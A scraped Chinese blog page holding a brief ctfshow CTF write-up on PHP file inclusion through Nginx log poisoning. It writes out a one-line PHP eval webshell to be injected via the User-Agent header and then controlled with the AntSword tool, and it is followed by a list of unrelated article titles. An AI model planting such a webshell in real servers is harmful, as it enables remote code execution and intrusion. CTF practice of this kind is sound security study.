当前位置: 首页 > news >正文

ctfshow_萌新web16-web20-----文件包含日志注入

news 2025/8/27 6:46:16
_萌新web16

解开md5

?c=36d

_萌新web17-----文件包含

禁用了php关键字,这个题禁了远程文件包含,进行日志注入

发现日志中有user-agent信息,因此我们可以在user-agent中写入木马

抓包burpsuit

User-agent:<?php @eval($_POST[cmd])?>抓包

然后连接蚁剑

_萌新web18-----文件包含

依旧Nginx服务器

尝试日志注入

User-agent:<?php @eval($_POST[cmd])?>抓包

然后连接蚁剑

打开36d.php文件拿到flag

_萌新web19-----文件包含

依旧同上

日志包含

bp

蚁剑

_萌新web20-----文件包含

同上

_萌新web21-----文件包含

http://www.dtcms.com/a/351533.html

相关文章:

  • 运算符(1)
  • 函数默认值的陷阱:用None和Docstring来描述可变默认值的参数 (Effective Python 第24条)
  • Qt 窗口 - 1
  • [Maven 基础课程]IDEA 配置 Maven
  • 基于 W55MH32Q-EVB 实现 FatFs 文件系统+FTP 服务器
  • C++ SNIFE
  • 数据结构——链表(2)——双向链表
  • 【图像处理 - 基础知识】ISP(Image Signal Processor)处理
  • 深度学习之卷积神经网络
  • 组件版本升级 - MySQL_8.4对比MySQL_8.0
  • 用 mem0 构建一个简单的 AI Healthcare 助手
  • 基于Vue通用组件定制化的场景解决
  • UNet改进(35):基于WGAM模块的PyTorch实战
  • Qt在Linux下编译发布 -- linuxdeployqt的使用
  • 第十九节:阴影进阶 - 软阴影与性能平衡技术
  • FileMenu Tools for Win:突破 Windows 文件管理困境的利器
  • Git:基本使用
  • 数字化转型三阶段:从信息化、数字化到数智化的战略进化
  • Leetcode+Java+动态规划II
  • 知行——同为科技24周年庆典
  • Thingsboard 租户管理员权限,增加租户普通用户权限
  • Go errgroup:高效并发控制与错误处理
  • WPF基于LiveCharts2图形库,实现:折线图,柱状图,饼状图
  • 03. 协程入门_Android异步处理机制
  • 系统架构设计师备考第7天——网络协议中间件软件构件
  • WebSocket简单了解
  • 线性代数之深入理解旋转矩阵
  • lesson46-2:Linux 高级指令全解析:从文件操作到系统管理
  • mybatisplus 配置二级缓存
  • 【系统编程】线程简介